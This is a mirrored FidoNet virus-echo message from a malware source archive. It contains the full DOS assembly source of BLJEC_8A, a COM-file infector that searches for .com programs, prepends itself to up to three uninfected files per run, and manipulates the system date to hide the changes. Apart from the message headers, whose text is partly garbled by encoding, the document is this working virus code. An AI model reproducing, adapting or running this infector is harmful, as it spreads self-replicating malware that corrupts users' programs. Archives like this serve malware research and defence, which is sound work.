mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
217 lines
4.6 KiB
NASM
217 lines
4.6 KiB
NASM
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|||
|
; Msg : 2 of 54
|
|||
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:10
|
|||
|
;To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
; Subj : BLJEC_8A.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;.RealName: Max Ivanov
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|||
|
;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:16)
|
|||
|
;* To : Brad Frazee
|
|||
|
;* Subj : BLJEC_8A.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;@RFC-Path:
|
|||
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|||
|
;18.n283!not-for-mail
|
|||
|
;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 100h
|
|||
|
kkk:
|
|||
|
nop ; ID
|
|||
|
count db 90h ; ID
|
|||
|
|
|||
|
mov cx,80h
|
|||
|
mov si,0080h
|
|||
|
mov di,0ff7fh
|
|||
|
rep movsb ; save param
|
|||
|
|
|||
|
lea ax,begp ; begin prog
|
|||
|
mov cx,ax
|
|||
|
sub ax,100h
|
|||
|
mov ds:[0fah],ax ; len VIR
|
|||
|
add cx,fso
|
|||
|
mov ds:[0f8h],cx ; begin buffer W
|
|||
|
ADD CX,AX
|
|||
|
mov ds:[0f6h],cx ; begin buffer R
|
|||
|
|
|||
|
mov cx,ax
|
|||
|
lea si,kkk
|
|||
|
mov di,ds:[0f8h]
|
|||
|
RB: REP MOVSB ; move v
|
|||
|
|
|||
|
mov al,3 ; inf. only 3 file
|
|||
|
mov count,al
|
|||
|
|
|||
|
mov ah,2ah
|
|||
|
int 21h
|
|||
|
mov ds:[0f2h],dx ;
|
|||
|
mov ds:[0f4h],cx ; save system date
|
|||
|
|
|||
|
stc
|
|||
|
|
|||
|
LEA DX,FFF
|
|||
|
MOV AH,4EH
|
|||
|
MOV CX,20H
|
|||
|
INT 21H ; find first
|
|||
|
|
|||
|
or ax,ax
|
|||
|
jz LLL
|
|||
|
jmp done
|
|||
|
|
|||
|
LLL:
|
|||
|
MOV AH,2FH
|
|||
|
INT 21H ; get DTA
|
|||
|
|
|||
|
mov ax,es:[bx+1ah]
|
|||
|
mov ds:[0fch],ax ; size
|
|||
|
add bx,1eh
|
|||
|
mov ds:[0feh],bx ; point to name
|
|||
|
|
|||
|
mov ax,'OC' ; "CO"
|
|||
|
sub ax,ds:[009eh]
|
|||
|
jne cont0 ; if file name CO*.com then skip
|
|||
|
jmp fin
|
|||
|
|
|||
|
cont0:
|
|||
|
add ax,180h ; if new len file + len VIR + 180h > FFF0
|
|||
|
add ax,ds:[0fah] ; then skip this file
|
|||
|
add ax,fso
|
|||
|
cmp ax,0fff0h
|
|||
|
jna cont2
|
|||
|
jmp fin
|
|||
|
|
|||
|
cont2:
|
|||
|
mov cx,ds:[98h]
|
|||
|
and cx,001fh
|
|||
|
mov dl,cl
|
|||
|
mov ax,ds:[98h]
|
|||
|
and ax,01e0h
|
|||
|
mov cl,5
|
|||
|
sar ax,cl
|
|||
|
mov dh,al
|
|||
|
mov ax,ds:[98h]
|
|||
|
and ax,0fe00h
|
|||
|
mov cl,9
|
|||
|
sar ax,cl
|
|||
|
mov cx,ax
|
|||
|
add cx,1980
|
|||
|
mov ah,2bh
|
|||
|
int 21h ; set system time
|
|||
|
|
|||
|
clc
|
|||
|
mov ax,3d02h
|
|||
|
mov dx,bx
|
|||
|
int 21h ; open file
|
|||
|
|
|||
|
mov bx,ax
|
|||
|
mov ah,3fh
|
|||
|
mov cx,ds:[0fch]
|
|||
|
mov dx,ds:[0f6h]
|
|||
|
int 21h ; read file
|
|||
|
|
|||
|
mov bx,dx
|
|||
|
mov ax,[bx]
|
|||
|
sub ax,9090h
|
|||
|
jz fin ; if file inf. then skip this file
|
|||
|
|
|||
|
mov al,'M'
|
|||
|
mov di,dx
|
|||
|
mov cx,ds:[0fch]
|
|||
|
repne scasb
|
|||
|
jne cont
|
|||
|
mov al,'Z'
|
|||
|
cmp es:[di],al
|
|||
|
je fin ; if converted then skip
|
|||
|
|
|||
|
cont:
|
|||
|
MOV AX,ds:[0fch]
|
|||
|
mov bx,ds:[0f6h]
|
|||
|
mov [bx-2],ax ; correct old len
|
|||
|
|
|||
|
mov ah,3ch
|
|||
|
mov cx,00h
|
|||
|
mov dx,ds:[0feh] ; point to name
|
|||
|
clc
|
|||
|
int 21h ; create file
|
|||
|
|
|||
|
mov bx,ax ; #
|
|||
|
mov ah,40h
|
|||
|
mov cx,ds:[0fch]
|
|||
|
add cx,ds:[0fah]
|
|||
|
mov DX,ds:[0f8h]
|
|||
|
int 21h ; write file
|
|||
|
|
|||
|
|
|||
|
mov ah,3eh
|
|||
|
int 21h ;close file
|
|||
|
|
|||
|
dec count
|
|||
|
jz done
|
|||
|
|
|||
|
FIN:
|
|||
|
stc
|
|||
|
mov ah,4fh
|
|||
|
int 21h ; find next
|
|||
|
|
|||
|
or ax,ax
|
|||
|
jnz done
|
|||
|
|
|||
|
JMP lll
|
|||
|
|
|||
|
DONE:
|
|||
|
mov dx,ds:[0f2h]
|
|||
|
mov cx,ds:[0f4h]
|
|||
|
mov ah,2bh
|
|||
|
int 21h
|
|||
|
|
|||
|
mov cx,80h
|
|||
|
mov si,0ff7fh
|
|||
|
mov di,0080h
|
|||
|
rep movsb ; restore param
|
|||
|
|
|||
|
MOV AX,0A4F3H
|
|||
|
mov ds:[0fff9h],ax
|
|||
|
mov al,0eah
|
|||
|
mov ds:[0fffbh],al
|
|||
|
mov ax,100h
|
|||
|
mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100
|
|||
|
|
|||
|
lea si,begp
|
|||
|
lea di,kkk
|
|||
|
mov ax,cs
|
|||
|
mov ds:[0fffeh],ax
|
|||
|
mov kk,ax
|
|||
|
mov cx,fso
|
|||
|
|
|||
|
db 0eah
|
|||
|
dw 0fff9h
|
|||
|
kk dw 0000h
|
|||
|
|
|||
|
fff db '*?.com',0
|
|||
|
fso dw 0005h ; source len file
|
|||
|
|
|||
|
|
|||
|
begp:
|
|||
|
MOV AX,4C00H
|
|||
|
int 21h ; exit
|
|||
|
|
|||
|
end kkk
|
|||
|
;
|
|||
|
;-+- FMail 0.96<EFBFBD>
|
|||
|
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;Yoo-hooo-oo, -!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20> The Me<4D>eO
|
|||
|
;
|
|||
|
;/e Ignore Extended Dictionary
|
|||
|
;
|
|||
|
;--- Aidstest Null: /Kill
|
|||
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|